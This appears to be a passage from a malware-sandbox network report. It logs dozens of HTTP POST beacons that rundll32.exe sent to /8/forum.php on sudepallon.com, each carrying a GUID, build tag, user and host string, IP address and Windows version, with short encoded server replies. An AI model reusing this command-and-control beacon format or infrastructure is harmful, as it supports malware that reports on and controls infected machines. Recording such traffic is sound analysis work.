                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.591022015 CEST5477INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cZQJAARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              79192.168.2.34980677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:59.549141884 CEST5477OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.616100073 CEST5478INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 54 47 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cJTGQARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              8192.168.2.34972877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:23.445317984 CEST677OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:23.511239052 CEST678INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:25 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 59 54 47 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cYTGBARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              80192.168.2.34980777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:59.904531956 CEST5479OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.972100973 CEST5481INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 42 59 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cVBYEARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              81192.168.2.34980877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:59.904548883 CEST5479OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.971338034 CEST5480INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4b 48 53 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cKHSPARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              82192.168.2.34980977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:59.959167957 CEST5480OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:00.024425983 CEST5481INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cZVEAARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              83192.168.2.34981077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:00.280903101 CEST5482OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:00.349575043 CEST5483INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 54 47 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cQTGJARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              84192.168.2.34981177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:00.281486988 CEST5483OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:00.348428011 CEST5483INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 4a 51 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cJJQQARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              85192.168.2.34981277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:00.355448961 CEST5484OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:00.423037052 CEST5484INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:02 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 46 5a 41 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cFZAUARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              86192.168.2.34981377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:00.661691904 CEST5486OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:00.729387045 CEST5486INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:02 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 59 41 5a 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cYAZBARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              87192.168.2.34981477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:00.666764975 CEST5486OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:00.732692957 CEST5487INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:02 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 4b 50 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cMKPNARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              88192.168.2.34981577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:00.762145042 CEST5487OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:00.831780910 CEST5488INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:02 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 46 42 59 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cFBYUARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              89192.168.2.34981677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:01.033865929 CEST5489OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:01.100677967 CEST5490INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:02 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 4a 51 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cMJQNARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              9192.168.2.34972977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:24.447570086 CEST678OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:24.515688896 CEST679INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:26 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cTZAGARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              90192.168.2.34981777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:01.050764084 CEST5489OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:01.115972042 CEST5490INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:02 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 41 56 45 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cAVEZARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              91192.168.2.34981877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:01.186212063 CEST5491OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:01.253911018 CEST5491INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:02 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 56 45 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cVVEEARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              92192.168.2.34981977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:01.431991100 CEST5492OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:01.500164032 CEST5493INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cQYBJARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              93192.168.2.34982077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:01.441323996 CEST5493OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:01.506544113 CEST5493INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 43 46 55 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
